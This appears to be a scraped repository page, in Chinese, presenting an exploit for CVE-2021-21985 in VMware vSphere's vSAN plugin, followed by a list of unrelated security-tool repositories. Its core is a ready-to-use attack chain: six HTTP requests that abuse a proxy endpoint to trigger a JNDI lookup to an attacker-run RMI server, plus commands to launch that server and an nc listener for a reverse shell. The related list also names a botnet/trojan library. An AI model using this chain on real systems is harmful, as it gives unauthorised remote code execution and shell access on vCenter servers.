cve-2021-21985 exploit

0x01 漏洞点

分析可见：

https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid7-analysis

0x02 exploit

对beans对象进行重新构造，实现rce。

bean列表：

localizedMessageBundle
vsanWorkerThreadFactory
vsanThreadPoolImpl
vsanServiceBundleActivator
vsanServiceFactory
vsanProviderUtils_setVmodlHelper
vsanProviderUtils_setVsanServiceFactory
vsanQueryUtil_setDataService
vsanComponentsProviderImpl
capabilityPropertyProviderImpl
pbmDataProviderImpl
vsanCapabilityCacheManager
vsanCapabilityUtils_setVsanCapabilityCacheManager
vsanUtils_setMessageBundle
vsanFormatUtils_setUserSessionService

随风大佬使用的vsanProviderUtils_setVmodlHelper在我这边环境没测试成功，就选用了另外的bean进行测试，由于Vsphere UI使用的tomcat中间件，可以通过jndi rmi bypass(https://github.com/welk1n/JNDI-Injection-Bypass/blob/master/src/main/java/payloads/EvilRMIServer.java）远程执行命令。

Step1
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetObject
{"methodInput":[null]}


Step2
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setStaticMethod
{"methodInput":["javax.naming.InitialContext.doLookup"]}

Step3
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetMethod
{"methodInput":["doLookup"]}

Step4 
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setArguments
{"methodInput":[["rmi://attip:1097/ExecByEL"]]}

Step5
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/prepare
{"methodInput":[]}

Step6
https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/invoke
{"methodInput":[]}

0x03 使用方法

启动rmi服务 java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer attip
启动reverse shell 侦听

nc -lvvp 5555

执行以上payload，得到reverse shell

cve-2021-21985 exploit

Related tags

Overview

cve-2021-21985 exploit

0x01 漏洞点

0x02 exploit

0x03 使用方法

0x04 reference

Owner

xnianq

Linus-png.github.io - Versionsverwaltung & Open Source Hausaufgabe

ProxyLogon Pre-Auth SSRF To Arbitrary File Write

SonicWALL SSL-VPN Web Server Vulnerable Exploit

List of S3 Hacks

APKLeaks - Scanning APK file for URIs, endpoints & secrets.

A Superfast SMS & Call bomber for Linux And Termux !

Website OSINT untuk mencari informasi dari email dan nomor telepon. Dibuat dengan React dan Flask.

Tool to check if your DNS comply to Polish Ministry of Finance gambling domains restrictions

Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.

A simple tool to audit Unix/*BSD/Linux system libraries to find public security vulnerabilities

client attack remotely , this script was written for educational purposes only

The self-hostable proxy tunnel

Course: Information Security with Python

A kAFL based hypervisor fuzzer which fully supports nested VMs

Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket.

A OSINT tool coded in python

BETA: Layla - recon tool for bug bounty

This tool allows to automatically test for Content Security Policy bypass payloads.

pybotnet - A Python Library for building Botnet , Trojan or BackDoor for windows and linux with Telegram control panel

GitHub Advance Security Compliance Action